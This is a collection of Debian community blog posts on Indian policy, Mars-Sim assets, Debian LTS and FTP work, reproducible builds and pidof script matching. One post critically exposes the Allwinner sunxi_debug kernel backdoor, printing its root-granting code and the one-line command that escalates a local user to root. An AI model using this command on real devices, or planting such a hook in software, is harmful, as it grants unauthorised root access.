Delhi Metro - courtesy wikipedia.org Statutory warning: it's a long read. I start by sharing a regret: I did not hold onto the Budget and Economics 101 blog post for one more day. I had been holding onto it and thinking about it for almost a couple of weeks before posting; if I had just waited a day more, I would have been able to share an Indian Express story. While I thought that the work for the budget starts around 3 months before the budget, I came to learn from that article that it takes 6 months. As can be seen in the article, it is somewhat of a wasted opportunity, part of it probably due to Government (irrespective of any political party, dynasty etc.) mismanagement. What has not been stated in the article is what I had shared earlier: reading between the lines, it seems that the Government isn't able to trust what it hears from its advisers and the man on the street. Unlike Chanakya and many wise people before him, who are credited with advising about good governance that a good king is one who goes out in disguise, learns how his/her subjects are surviving, sees what ails them, and takes or even does not take corrective steps after seeing the problem from various angles. Of course it's easier said than done, though a lot of Indian kings did try and ran successful provinces. There were also some who were more interested in gambling and women and threw/frittered away their kingdoms. The 6-month figure, while not stated in the Express article, is probably more about checking and re-checking figures and sources to make sure they are able to read whatever pattern the various big businesses, industry, social welfare schemes and people are showing, I guess. And unless mass digitalization as well as an overhaul of procedures and Right to Information (RTI) happens, I don't see any improvement in the way the information is collected, interpreted and shared with the public at large. It would also require people who are able to figure out how things work sharing their inferences (right or wrong) through various media, so there is discussion about figures and policy-making. Such researchers and their findings are sadly missing in Indian public discourse and only found in glossy coffee table books :(. One of the most basic questions, for instance, is: how much of any policy should be based on facts and figures, and how much on giving a fillip to products and services needed in the short to medium term? Also, how much should morality play a part in public policy? Surprisingly, or probably not, most Indian budgets are populist by nature with some scientific basis, but most of the time there is no dialogue about how the FM came to some conclusion or policy. I am guessing a huge part of that also has to do with basic illiteracy, as well as economic and financial illiteracy. Just to share a well-known example: one of the policies where the Government of India has been somewhat lethargic is wired broadband penetration. As I have shared umpteen times, while superficially broadband penetration is happening, most of it is the unreliable and more expensive mobile broadband kind. While this may come as a shock to many users of technology, BSNL, a Government company which provides broadband to almost 70-80% of the ADSL wired broadband subscribers, gives a 50:1 contention ratio to its customers. One can now understand the pathetic speeds, along with the very old copper wiring (20-odd years) on which the network is running.
The idea/idiom of running a network using duct tape seems pretty apt here. Now, the Government a couple of years ago introduced FTTH (fiber-to-the-home), but because the charges are so high, it's not going anywhere. The Government could say: 10% discount on your income tax rates if you get FTTH. This would push people to get FTTH and would also force BSNL to clean up its act. It has been documented that a percentage increase in broadband equals a similar percentage rise in GDP. Having higher broadband speeds would mean better quality of streaming video as well as all sorts of remote teaching and sharing of ideas, which would give a lot of fillip to all sorts of IT peripherals in the short, medium and long term as well. Not to mention all the software that will be invented/coded to take advantage of all that speed. Although, realistically speaking, I am cynical that the Government would bring in something like this. Moving on Behind a truck - Courtesy TheEconomist.com Another interesting story which I had shared was a bit about world history. Now the Economist has sort of confirmed how things are in Pakistan. What is and was interesting is that the article comes from a politically left-leaning magazine which is for globalization and business, among other things. So, there seem to be only three options: either I and the magazine are correct, or we both are reading it wrong. The third and last option is that the United States realizes that Pakistan can no longer be trusted, as Pakistan is siding more and more with the Chinese and Russians; hence the article. Although it seems a somewhat far-fetched idea, as I don't see the magazine getting any brownie points with President Trump. Unless The Economist becomes more hawkish, more right-wingish, due to the new establishment. I can't claim to have any major political understanding or expertise, but it does seem that Pakistan is losing friends. Even the UAE has been cautiously building bridges with us. How this will play out in the medium to long term depends much on the personal equations of the two heads of state, happenings in geopolitics around the world and in the two countries, and the decisions they take; it is a welcome opportunity insofar as they (the Saudis) have funds they want to invest, and India can use those investments to build new infrastructure. Now, I need a bit of help from Java and VCS (version control system) experts. There is a small game project called Mars-Sim. I asked probably a few more questions than I should have, and the result was that I was made a member of the game team, even though I had shared with them that I'm a non-coder. I think such a game is important as it's FOSS: both the game itself and its build tools are FOSS, with a basic wiki. Such a game would be useful not only to Debian but to all free software distributions. Journeying into the game Unfortunately, the game as it currently is doesn't work with OpenJDK 8, but private conversations with the devs have shared that they will work on getting it to run on OpenJDK 9, which though is some time away. Now, as it is a game, I knew it would have multiple multimedia assets. It took me quite some time to figure out where most of the multimedia assets are. I was shocked to find that there isn't any tool in Debian, or GNU/Linux generally, to find out what types of content are inside a directory and its sub-directories. I framed it as a query and found a script as an answer. I renamed the script to file-extension-information.sh (for lack of a better name).
After that, I downloaded a snapshot of the head of the project from https://sourceforge.net/p/mars-sim/code/HEAD/tree/ where it shows a link to download the snapshot (https://sourceforge.net/code-snapshots/svn/m/ma/mars-sim/code/mars-sim-code-3847-trunk.zip), unzipped it, and then ran the script on it:
[$] bash file-extension-information.sh mars-sim-code-3846-trunk
theme: 1770
dtd: 31915
py: 10815
project: 5627
JPG: 762476
fxml: 59490
vm: 876
dat: 15841044
java: 13052271
store: 1343
gitignore: 8
jpg: 3473416
md: 5156
lua: 57
gz: 1447
desktop: 281
wav: 83278
1: 2340
css: 323739
frag: 471
svg: 8948591
launch: 9404
index: 11520
iml: 27186
png: 3268773
json: 1217
ttf: 2861016
vert: 712
ogg: 12394801
prefs: 11541
properties: 186731
gradle: 611
classpath: 8538
pro: 687
groovy: 2711
form: 5780
txt: 50274
xml: 794365
js: 1465072
dll: 2268672
html: 1676452
gif: 38399
sum: 23040
(none): 1124
jsx: 32070
It gave me some idea of what sorts of files were under the repository. I do wish the script defaulted to showing file sizes in KB if not MB, to better assess how the directory is made up, but that is not a big loss (a size-aware sketch follows the ncdu listing below). The above listing told me that there are, at the very least, theme, JPG, dat, wav, png, ogg and lastly gif files. For lack of better tools, and to get an overview of where those multimedia assets live, I used ncdu:
[shirish@debian] - [~/games/mars-sim-code-3846-trunk] - [10210]
[$] ncdu mars-sim/
--- /home/shirish/games/mars-sim-code-3846-trunk/mars-sim --------------------------------------------------------------------------------------
46.2 MiB [##########] /mars-sim-ui
15.2 MiB [### ] /mars-sim-mapdata
8.3 MiB [# ] /mars-sim-core
2.1 MiB [ ] /mars-sim-service
500.0 KiB [ ] /mars-sim-main
188.0 KiB [ ] /mars-sim-android
72.0 KiB [ ] /mars-sim-network
16.0 KiB [ ] pom.xml
12.0 KiB [ ] /.settings
4.0 KiB [ ] mars-sim.store
4.0 KiB [ ] mars-sim.iml
4.0 KiB [ ] .project
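Returning to the wish above for a size-aware summary: a minimal sketch of such a script (standard find and awk only; it does not handle filenames containing spaces) could look like this:
#!/bin/sh
# Sum file sizes per extension under the given directory, in KiB.
find "${1:-.}" -type f -printf '%s %f\n' |
awk '{ n = split($2, a, "."); ext = (n > 1) ? a[n] : "(none)";
       size[ext] += $1 }
     END { for (e in size) printf "%s: %.0f KiB\n", e, size[e] / 1024 }'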
I found that all the media is distributed randomly and posted a ticket about it. As I'm not even a Java newbie, could somebody look at mokun's comment and help out, please? On the same project, there has been talk of migrating to github.com. Now, from whatever little I know of git, it makes a copy of the whole repository under the .git/ folder/directory, so having multimedia assets under git is a bad, bad idea, as each multimedia binary-format file would be unique, with no possibility of a diff between two binary files even though they may be the same file with some addition or subtraction from an earlier version. I did file a question but am unhappy with the answers given. Can anybody give some definitive answers if they have been able to do what I am proposing, and if yes, how did they go about it? And lastly Immigrants of the United States in 2000 by country of birth America was founded by immigrants. Everybody knows the story about American Indians: the originals of the land were overpowered by the European settlers. So any claim, then and now, that immigration did not help the United States is just a lie. This came up due to a conversation on #debconf by andrewsh:
[18:37:06] I'd be more than happy myself to apply for an US tourist not transit visa when I really need it, as a transit visa isn't really useful, is just as costly as a tourist visa, and nearly as difficult to get as a tourist visa
[18:37:40] I'm not entirely sure I wish to transit through the US in its Trumplandia incarnation either
[18:38:07] likely to be more difficult and unfun
FWIW I am in complete agreement with Andrew's assessment of how it might be for foreigners. It has been on my mind and in my thoughts for quite some time, although andrewsh put it eloquently. But as always, I'm getting ahead of myself. The conversation is because debconf this year will be in Canada. For many a cheap flight, one of the likely layovers/stopovers can be the United States. I actually would have gone one step further: even if it was a cheap transit visa, it would be equally unfun, as it would discriminate. About a couple of years back, a friend of mine, while explaining what a visa is, put it rather succinctly: the visa officer looks at only 3 things a. your financial position, something which tells that you can take care of your financial needs if things go south b. you are not looking to settle there unlawfully c. you are not a criminal. While costs do matter, what is more disturbing is the form of extremism being displayed therein. While Indians from the South Asian continent in the US have been largely successful and love to be in peace (one-off incidents do and will happen anywhere), if I had to take a transit or tourist visa in this atmosphere, it would leave a bad taste in the mouth. When one of my best friends is a Muslim, 20% of the population in India is made of Muslims, and 99% of the time both of us co-exist in peace, I simply can't take any alternative ideology. Even in Freakonomics 2.0, the authors shared that it's less than 0.1 percent of Muslims who are engaged in terrorist activities; if they were even 1 percent, then all the world's armed forces couldn't fight them and couldn't keep anyone safe. Which simply means that 99.99% of all Muslims are good. This resonates strongly with me for a number of reasons. One of my uncles in the early-to-late 80s had an opportunity to visit Russia for official work. He went there and there were secret police after him all the time. While he didn't know it at the time, I later read that it was SOP (Standard Operating Procedure) when any and all foreigners came visiting the country; and not just foreigners, they had spies for their own citizens. Russka, a book I read several years ago, explained the paranoia beautifully. The U.S. in those days was a more welcoming place for him. I am thankful, as well as find it strange, that Canada and the States have such different visa procedures. Canada would simply look at the above things, probably discreetly inquire about you if you have been a bad boy/girl in any way, and then make a decision, which is fine. For the United States, even for a transit visa I probably would have to go to an interview, where my world view would probably be in conflict with the current American world view. Interestingly, while I was looking at conversations on the web, one thing that is missing there is that nobody has talked about the intelligence community. What Mr. Trump is saying in not so many words is: even with all the e-mails we monitor and everything we do, our intelligence still can't catch you. It almost seems like giving a back-handed compliment to the extremists, saying you do a better job than our intelligence community. This doesn't mean that the States doesn't have interesting things to give to the world: Star Trek conventions, the Grand Canyon (which would probably require me a month or more to explore even a little part of), NASA, Intel, AMD, SpaceX, CES (when it's held) and LPC (the Linux Plumbers Conference, where the who's who come to think of the roadmap for GNU/Linux).
What I wouldn't give to be a fly on the wall when LPC or CES happens in the States. What I actually found very interesting is that in the current Canadian Government, if what I read and heard is true, Justin Trudeau, the Prime Minister of Canada, made 50% of his cabinet female. Just like in the article, studies even in the Indian parliament have shown that when women are in power, questions about social justice, equality and the common good get asked and policies made. If I do get the opportunity to be part of debconf, I would like to see, hear, watch and learn how the women in cabinet are doing things. I am assuming that the reporting and analysis standards around whatever decisions are taken are more transparent, and that more people are engaged in the political process to know what their elected representatives are doing. Mountain biking in British Columbia, Canada - source wikipedia.org Another interesting point I came to know is that Canada is home to bicycling paths. While I stopped bicycling years ago, as it has been becoming more and more dangerous to bicycle here in Pune since there is no demarcation for cyclists, I am sure a lot of Canadians must be using this opportunity fully. Lastly, on the debconf preparation front, things have started becoming a bit more urgent and hectic. From a monthly IRC meet, it has now become a weekly meet. Both the wiki and the website are slowly taking shape. http://deb.li/dc17kbp is a nice way to see the progress of the activities happening. One important decision that will be taken today is where people will stay during debconf. There are options between on-site and two places around the venue, one around the 1.9 km mark, the other at 5 km. Each has its own good and bad points. It will be interesting to see which place gets selected and why.
Filed under: Miscellaneous Tagged: #budget, #Canada, #debconf organization, #discrimination, #Equal Opportunity, #Fiber, #svn, #United States, #Version Control, Broadband, Git, Pakistan, Subversion

30 June 2016

Chris Lamb: Free software activities in June 2016

Here is my monthly update covering a large part of what I have been doing in the free software world (previously):
Debian My work in the Reproducible Builds project was covered in our weekly reports. (#58, #59 & #60)
Debian LTS

This month I have been paid to work 18 hours on Debian Long Term Support (LTS). In that time I did the following:
  • "Frontdesk" duties, triaging CVEs, etc.
  • Extended the lts-cve-triage.py script to ignore packages that are not subject to Long Term Support.

  • Issued DLA 512-1 for mantis fixing an XSS vulnerability.
  • Issued DLA 513-1 for nspr correcting a buffer overflow in a sprintf utility.
  • Issued DLA 515-1 for libav patching a memory corruption issue.
  • Issued DLA 524-1 for squidguard fixing a reflected cross-site scripting vulnerability.
  • Issued DLA 525-1 for gimp correcting a use-after-free vulnerability in the channel and layer properties parsing process.

Uploads
  • redis (2:3.2.1-1) New upstream bugfix release, plus subsequent upload to the backports repository.
  • python-django (1.10~beta1-1) New upstream experimental release.
  • libfiu (0.94-5) Misc packaging updates.


RC bugs

I also filed 170 FTBFS bugs against a7xpg, acepack, android-platform-dalvik, android-platform-frameworks-base, android-platform-system-extras, android-platform-tools-base, apache-directory-api, aplpy, appstream-generator, arc-gui-clients, assertj-core, astroml, bamf, breathe, buildbot, cached-property, calf, celery-haystack, charmtimetracker, clapack, cmake, commons-javaflow, dataquay, dbi, django-celery, django-celery-transactions, django-classy-tags, django-compat, django-countries, django-floppyforms, django-hijack, django-localflavor, django-markupfield, django-model-utils, django-nose, django-pipeline, django-polymorphic, django-recurrence, django-sekizai, django-sitetree, django-stronghold, django-taggit, dune-functions, elementtidy, epic4-help, fcopulae, fextremes, fnonlinear, foreign, fort77, fregression, gap-alnuth, gcin, gdb-avr, ggcov, git-repair, glance, gnome-twitch, gnustep-gui, golang-github-audriusbutkevicius-go-nat-pmp, golang-github-gosimple-slug, gprbuild, grafana, grantlee5, graphite-api, guacamole-server, ido, jless, jodreports, jreen, kdeedu-data, kdewebdev, kwalify, libarray-refelem-perl, libdbusmenu, libdebian-package-html-perl, libdevice-modem-perl, libindicator, liblrdf, libmail-milter-perl, libopenraw, libvisca, linuxdcpp, lme4, marble, mgcv, mini-buildd, mu-cade, mvtnorm, nose, octave-epstk, onioncircuits, opencolorio, parsec47, phantomjs, php-guzzlehttp-ringphp, pjproject, pokerth, prayer, pyevolve, pyinfra, python-asdf, python-ceilometermiddleware, python-django-bootstrap-form, python-django-compressor, python-django-contact-form, python-django-debug-toolbar, python-django-extensions, python-django-feincms, python-django-formtools, python-django-jsonfield, python-django-mptt, python-django-openstack-auth, python-django-pyscss, python-django-registration, python-django-tagging, python-django-treebeard, python-geopandas, python-hdf5storage, python-hypothesis, python-jingo, python-libarchive-c, python-mhash, python-oauth2client, python-proliantutils, python-pytc, python-restless, python-tidylib, python-websockets, pyvows, qct, qgo, qmidinet, quodlibet, r-cran-gss, r-cran-runit, r-cran-sn, r-cran-stabledist, r-cran-xml, rgl, rglpk, rkt, rodbc, ruby-devise-two-factor, ruby-json-schema, ruby-puppet-syntax, ruby-rspec-puppet, ruby-state-machine, ruby-xmlparser, ryu, sbd, scanlogd, signond, slpvm, sogo, sphinx-argparse, squirrel3, sugar-jukebox-activity, sugar-log-activity, systemd, tiles, tkrplot, twill, ucommon, urca, v4l-utils, view3dscene, xqilla, youtube-dl & zope.interface.

FTP Team

As a Debian FTP assistant I ACCEPTed 186 packages: akonadi4, alljoyn-core-1509, alljoyn-core-1604, alljoyn-gateway-1504, alljoyn-services-1504, alljoyn-services-1509, alljoyn-thin-client-1504, alljoyn-thin-client-1509, alljoyn-thin-client-1604, apertium-arg, apertium-arg-cat, apertium-eo-fr, apertium-es-it, apertium-eu-en, apertium-hbs, apertium-hin, apertium-isl, apertium-kaz, apertium-spa, apertium-spa-arg, apertium-tat, apertium-urd, arc-theme, argus-clients, ariba, beast-mcmc, binwalk, bottleneck, colorfultabs, dh-runit, django-modeltranslation, dq, dublin-traceroute, duktape, edk2, emacs-pdf-tools, eris, erlang-p1-oauth2, erlang-p1-sqlite3, erlang-p1-xmlrpc, faba-icon-theme, firefox-branding-iceweasel, golang-1.6, golang-defaults, golang-github-aelsabbahy-gonetstat, golang-github-howeyc-gopass, golang-github-oleiade-reflections, golang-websocket, google-android-m2repository-installer, googler, goto-chg-el, gr-radar, growl-for-linux, guvcview, haskell-open-browser, ipe, labplot, libalt-alien-ffi-system-perl, libanyevent-fcgi-perl, libcds-savot-java, libclass-ehierarchy-perl, libconfig-properties-perl, libffi-checklib-perl, libffi-platypus-perl, libhtml-element-library-perl, liblwp-authen-oauth2-perl, libmediawiki-dumpfile-perl, libmessage-passing-zeromq-perl, libmoosex-types-portnumber-perl, libmpack, libnet-ip-xs-perl, libperl-osnames-perl, libpodofo, libprogress-any-perl, libqtpas, librdkafka, libreoffice, libretro-beetle-pce-fast, libretro-beetle-psx, libretro-beetle-vb, libretro-beetle-wswan, libretro-bsnes-mercury, libretro-mupen64plus, libservicelog, libtemplate-plugin-datetime-perl, libtext-metaphone-perl, libtins, libzmq-ffi-perl, licensecheck, link-grammar, linux, linux-signed, lua-busted, magics++, mkalias, moka-icon-theme, neutron-vpnaas, newlisp, node-absolute-path, node-ejs, node-errs, node-has-flag, node-lodash-compat, node-strip-ansi, numba, numix-icon-theme, nvidia-graphics-drivers, nvidia-graphics-drivers-legacy-304xx, nvidia-graphics-drivers-legacy-340xx, obs-studio, opencv, pacapt, pgbackrest, postgis, powermock, primer3, profile-sync-daemon, pyeapi, pypandoc, pyssim, python-cutadapt, python-cymruwhois, python-fisx, python-formencode, python-hkdf, python-model-mommy, python-nanomsg, python-offtrac, python-social-auth, python-twiggy, python-vagrant, python-watcherclient, python-xkcd, pywps, r-bioc-deseq2, r-bioc-dnacopy, r-bioc-ensembldb, r-bioc-geneplotter, r-cran-adegenet, r-cran-adephylo, r-cran-distory, r-cran-fields, r-cran-future, r-cran-globals, r-cran-htmlwidgets, r-cran-listenv, r-cran-mlbench, r-cran-mlmrev, r-cran-pheatmap, r-cran-pscbs, r-cran-r.cache, refind, relatorio, reprotest, ring, ros-ros-comm, ruby-acts-as-tree, ruby-chronic-duration, ruby-flot-rails, ruby-numerizer, ruby-u2f, selenium-firefoxdriver, simgrid, skiboot, smtpping, snap-confine, snapd, sniffles, sollya, spin, subuser, superlu, swauth, swift-plugin-s3, syncthing, systemd-bootchart, tdiary-theme, texttable, tidy-html5, toxiproxy, twinkle, vmtk, wait-for-it, watcher, wcslib & xapian-core.

14 May 2016

Gunnar Wolf: Debugging backdoors and the usual software distribution for embedded-oriented systems

In the ARM world, to which I am still mostly a newcomer (although I've been playing with ARM machines for over two years, I am a complete newbie compared to my Debian friends who live and breathe that architecture), the most common way to distribute operating systems is to distribute complete, already-installed images. I have ranted in the past on how those images ought to be distributed. Some time later, I also discussed on my blog how most of this hardware requires unauditable binary blobs and other non-upstreamed modifications to Linux. In the meanwhile, I started teaching on the Embedded Linux diploma course in Facultad de Ingeniería, UNAM. It has been quite successful, and fun. Anyway, one of the points we emphasize to our students is that the very concept of embedded makes the mere idea of downloading a pre-built, 4GB image, loaded with a (supposedly lightweight, but far fatter than my usual) desktop environment and whatnot, an irony. As part of the "Linux Userspace" and "Boot process" modules, we put a lot of emphasis on how to build a minimal image. And even leaving installed size aside, it all boils down to trust. We teach mainly four different ways of setting up a system: […] Now... In the past few days, a huge vulnerability / oversight was discovered and made public, supporting my distrust of distribution forms that do not come from, well... the people we already know and trust to do this kind of work! Most current ARM chips cannot run with the stock, upstream Linux kernel. They require a set of patches that different vendors pile up to support their basic hardware (remember, these systems are almost always systems-on-a-chip, SoCs). Some vendors do take on the hard work of trying to upstream their changes, that is, pushing the changes they made to the kernel for inclusion in mainline Linux. This is a very hard task, and many vendors just abandon it. So, in many cases, we are stuck running nonstandard kernels, full of huge modifications... and we trust them to do things right. After all, if they are knowledgeable enough to design a SoC, they should do at least decent kernel work, right? Turns out, it's far from the case. I have a very nice and nifty Banana Pi M3, based on the Allwinner A83T SoC. 2GB RAM, 8 ARM cores... a very nice little system, almost usable as a desktop. But it only boots with their modified 3.4.x kernel. This kernel has a very ugly flaw: a debugging mode left open, which allows any local user to become root. Even on a mostly-clean Debian system, installed by a chrooted debootstrap:
Debian GNU/Linux 8 bananapi ttyS0
banana login: gwolf
Password:
Last login: Thu Sep 24 14:06:19 CST 2015 on ttyS0
Linux bananapi 3.4.39-BPI-M3-Kernel #9 SMP PREEMPT Wed Sep 23 15:37:29 HKT 2015 armv7l
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gwolf@banana:~$ id
uid=1001(gwolf) gid=1001(gwolf) groups=1001(gwolf),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
gwolf@banana:~$ echo rootmydevice > /proc/sunxi_debug/sunxi_debug
gwolf@banana:~$ id
groups=0(root),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),1001(gwolf)
Why? Oh, well, in this kernel somebody forgot to comment out (or outright remove!) the sunxi-debug.c file, or at the very least, a horrid part of code therein (it's a very small, simple file):
if(!strncmp("rootmydevice",(char*)buf,12)){
        cred = (struct cred *)__task_cred(current);
        cred->uid = 0;
        cred->gid = 0;
        cred->suid = 0;
        cred->euid = 0;
        cred->euid = 0;
        cred->egid = 0;
        cred->fsuid = 0;
        cred->fsgid = 0;
        printk("now you are root\n");
}
Now... Just by looking at this file, many things should be obvious. For example, this is not only dangerous and lazy (it exists so developers can debug by touching a file instead of... typing a password?), but also goes against the kernel coding guidelines: the file is not documented nor commented at all. Peeking around other files in the repository, it becomes obvious that many files suffer from this same basic issue, and getting this upstreamed would become a titanic task. If their programmers had tried to adhere to the guidelines to begin with, integration would be a much easier path. Cutting the wrong corners will just increase the amount of work needed. Anyway, enough said by me. Some other sources of information: There are surely many other mentions of this. I just had to repeat it for my local echo chamber, and for future reference in class! ;-)

30 April 2016

Chris Lamb: Free software activities in April 2016

Here is my monthly update covering a large part of what I have been doing in the free software world (previously):
Debian My work in the Reproducible Builds project was covered in our weekly reports. (#48, #49, #50, #51 & #52)
Uploads
  • redis (2:3.0.7-3) Adding, amongst some other changes, systemd LimitNOFILE support to allow a higher number of open file descriptors.


FTP Team

As a Debian FTP assistant I ACCEPTed 135 packages: aptitude, asm, beagle, blends, btrfs-progs, camitk, cegui-mk2, cmor-tables, containerd, debian-science, debops, debops-playbooks, designate-dashboard, efitools, facedetect, flask-testing, fstl, ganeti-os-noop, gnupg, golang-fsnotify, golang-github-appc-goaci, golang-github-benbjohnson-tmpl, golang-github-dchest-safefile, golang-github-docker-go, golang-github-dylanmei-winrmtest, golang-github-hawkular-hawkular-client-go, golang-github-hlandau-degoutils, golang-github-hpcloud-tail, golang-github-klauspost-pgzip, golang-github-kyokomi-emoji, golang-github-masterminds-semver-dev, golang-github-masterminds-vcs-dev, golang-github-masterzen-xmlpath, golang-github-mitchellh-ioprogress, golang-github-smartystreets-assertions, golang-gopkg-hlandau-configurable.v1, golang-gopkg-hlandau-easyconfig.v1, golang-gopkg-hlandau-service.v2, golang-objx, golang-pty, golang-text, gpaste, gradle-plugin-protobuf, grip, haskell-brick, haskell-hledger-ui, haskell-lambdabot-haskell-plugins, haskell-text-zipper, haskell-werewolf, hkgerman, howdoi, jupyter-client, jupyter-core, letsencrypt.sh, libbpp-phyl, libbpp-raa, libbpp-seq, libbpp-seq-omics, libcbor-xs-perl, libdancer-plugin-email-perl, libdata-page-pageset-perl, libevt, libevtx, libgit-version-compare-perl, libgovirt, libmsiecf, libnet-ldap-server-test-perl, libpgobject-type-datetime-perl, libpgobject-type-json-perl, libpng1.6, librest-client-perl, libsecp256k1, libsmali-java, libtemplates-parser, libtest-requires-git-perl, libtext-xslate-perl, linux, linux-signed, mandelbulber2, netlib-java, nginx, node-rc, node-utml, nvidia-cuda-toolkit, openfst, openjdk-9, openssl, php-cache-integration-tests, pulseaudio, pyfr, pygccxml, pytest-runner, python-adventure, python-arrayfire, python-django-feincms, python-fastimport, python-fitsio, python-imagesize, python-lib389, python-libtrace, python-neovim-gui, python3-proselint, pythonpy, pyzo, r-cran-ca, r-cran-fitbitscraper, r-cran-goftest, r-cran-rnexml, r-cran-rprotobuf, rrdtool, ruby-proxifier, ruby-seamless-database-pool, ruby-syslog-logger, rustc, s5, sahara-dashboard, salt-formula-ceilometer, salt-formula-cinder, salt-formula-glance, salt-formula-heat, salt-formula-horizon, salt-formula-keystone, salt-formula-neutron, salt-formula-nova, seer, simplejson, smrtanalysis, tiles-autotag, tqdm, tran, trove-dashboard, vim, vulkan, xapian-bindings & xapian-core.

14 February 2016

Lunar: Reproducible builds: week 42 in Stretch cycle

What happened in the reproducible builds effort between February 7th and February 13th 2016:

Toolchain fixes
  • James McCoy uploaded devscripts/2.16.1 which makes dcmd support .buildinfo files. Original patch by josch.
  • Lisandro Damián Nicanor Pérez Meyer uploaded qt4-x11/4:4.8.7+dfsg-6 which makes files created by qch reproducible by using a fixed date instead of the current time. Original patch by Dhole.
Norbert Preining rejected the patch submitted by Reiner Herrmann to make the CreationDate not appear in comments of DVI / PS files produced by TeX. He also mentioned that some timestamps can be replaced by using the -output-comment option, and that the next version of pdftex will have patches inspired by reproducible builds to mitigate the effects (see the SOURCE_DATE_EPOCH patches).
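For context, SOURCE_DATE_EPOCH is an environment variable that timestamp-embedding tools consult instead of the current time. A hedged example of exporting it from a Debian changelog before building (the usual idiom, not tied to any particular package here):
SOURCE_DATE_EPOCH=$(date -d "$(dpkg-parsechangelog -SDate)" +%s)
export SOURCE_DATE_EPOCH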

Packages fixed The following packages have become reproducible due to changes in their build dependencies: abntex, apt-dpkg-ref, arduino, c++-annotations, cfi, chaksem, clif, cppreference-doc, dejagnu, derivations, ecasound, fdutils, gnash, gnu-standards, gnuift, gsequencer, gss, gstreamer0.10, gstreamer1.0, harden-doc, haskell98-report, iproute2, java-policy, libbluray, libmodbus, lizardfs, mclibs, moon-buggy, nurpawiki, php-sasl, shishi, stealth, xmltex, xsom. The following packages became reproducible after getting fixed: Some uploads fixed some reproducibility issues, but not all of them: Patches submitted which have not made their way to the archive yet:
  • #813944 on cvm by Reiner Herrmann: remove gzip headers, fix permissions of some directories and the order of the md5sums.
  • #814019 on latexdiff by Reiner Herrmann: remove the current build date from documentation.
  • #814214 on rocksdb by Chris Lamb: add support for SOURCE_DATE_EPOCH.
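For context, these patches all follow the SOURCE_DATE_EPOCH convention: if the variable is set in the build environment, embed that timestamp instead of the current time. A minimal C sketch of the usual pattern (the build_time helper name is just for illustration, not code from any of the packages above):

#include <stdlib.h>
#include <stdio.h>
#include <time.h>

/* Return the timestamp to embed in build output: SOURCE_DATE_EPOCH
 * if set (seconds since the Unix epoch), otherwise the current time. */
static time_t build_time(void)
{
    const char *s = getenv("SOURCE_DATE_EPOCH");
    if (s != NULL && *s != '\0')
        return (time_t)strtoll(s, NULL, 10);
    return time(NULL);
}

int main(void)
{
    time_t t = build_time();
    char buf[64];
    /* Use gmtime so the embedded date does not vary with the builder's
     * timezone, another common source of unreproducibility. */
    strftime(buf, sizeof buf, "%Y-%m-%d %H:%M:%S UTC", gmtime(&t));
    printf("Built on %s\n", buf);
    return 0;
}

Run with SOURCE_DATE_EPOCH=0 exported, the program always prints the same date, regardless of when or where it is built.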

reproducible.debian.net A new armhf build node has been added (thanks to Vagrant Cascadian) and integrated into the Jenkins setup for 4 new armhf builder jobs. (h01ger) All packages for Debian testing (Stretch) have been tested on armhf in just 42 days. It took 114 days to reach the same point for unstable back when the armhf test infrastructure was much smaller. Package sets have been enabled for testing on armhf. (h01ger) Packages producing architecture-independent (Arch:all) binary packages together with architecture-dependent packages targeted for specific architectures will now only be tested on matching architectures. (Steven Chamberlain, h01ger) As the Jenkins setup is now made of 252 different jobs, the overview has been split into 11 different smaller views. (h01ger)

Package reviews 222 reviews have been removed, 110 added and 50 updated in the previous week. 35 FTBFS reports were made by Chris Lamb, Danny Edel, and Niko Tyni.

Misc. The recordings of Ludovic Courtès' talk at FOSDEM 16 about reproducible builds and GNU Guix are now available. One can also have a look at the slides from Fabian Keil's talk about ElectroBSD and Baptiste Daroussin's talk about FreeBSD packages.

28 January 2016

Craig Small: pidof lost a shell

pidof is a program that reports the PID of a process that has the given command line. It has an option, -x, which means "scripts too". The idea behind this is that if you have a shell script, it will find it. Recently an issue was raised saying pidof was not finding a shell script. Trying it out, pidof indeed could not find the sample script, but it found other scripts; what was going on? What is a script? Seems pretty simple really: a shell script is a text file that is interpreted by a shell program. At the top of the file you have a hash bang line, which starts with #! followed by the name of the shell that is going to interpret the text. When you use the -x option, pidof uses the following code:
          if (task.cmd &&
                    !strncmp(task.cmd, cmd_arg1base, strlen(task.cmd)) &&
                    (!strcmp(program, cmd_arg1base) ||
                    !strcmp(program_base, cmd_arg1) ||
                    !strcmp(program, cmd_arg1)))
What this means is: match if the process comm (task.cmd) is a prefix of the basename of argv[1], and one of the following holds (a short C sketch at the end of this post runs this check against the two example processes):
  • program matches the basename of argv[1]
  • the basename of program matches argv[1]
  • program matches argv[1]

The Hash Bang Line Most scripts I have come across start with a line like
#!/bin/sh
Which means: use the normal shell interpreter (on my system, dash). What was different? The test script had a first line of
#!/usr/bin/env sh
Which means run the program sh in a new environment. Could this be the difference? The first type of script has the following procfs files:
$ cat -e /proc/30132/cmdline
/bin/sh^@/tmp/pidofx^@
$ cut -f 2 -d' ' /proc/30132/stat
(pidofx)
The first line picks up argv[1] "/tmp/pidofx" while the second finds comm "pidofx". The primary matching is satisfied, as well as the first dot-point, because the basename of argv[1] is "pidofx". What about the script that uses env?
$ cat -e /proc/30232/cmdline
bash^@/tmp/pidofx^@
$ cut -f 2 -d' ' /proc/30232/stat
(bash)
The comm "bash" does not match the basename of argv[1], so this process is not found.

How many execve? So the proc filesystem is reporting the scripts differently depending on the first line, but why? The fields change depending on what process is running, and that depends on the execve function calls. A typical script has a single execve call, as the strace output shows:
29332 execve("./pidofx", ["./pidofx"], [/* 24 vars */]) = 0
While the env has a few more:
29477 execve("./pidofx", ["./pidofx"], [/* 24 vars */]) = 0
29477 execve("/usr/local/bin/sh", ["sh", "./pidofx"], [/* 24 vars */]) = -1 ENOENT (No such file or directory)
29477 execve("/usr/bin/sh", ["sh", "./pidofx"], [/* 24 vars */]) = -1 ENOENT (No such file or directory)
29477 execve("/bin/sh", ["sh", "./pidofx"], [/* 24 vars */]) = 0
The first execve is the same for both, but then env is called and it goes on its merry way to find sh. After trying /usr/local/bin and /usr/bin, it finds sh in /bin and execs this program. Because there are two successful execve calls, the procfs fields are different.

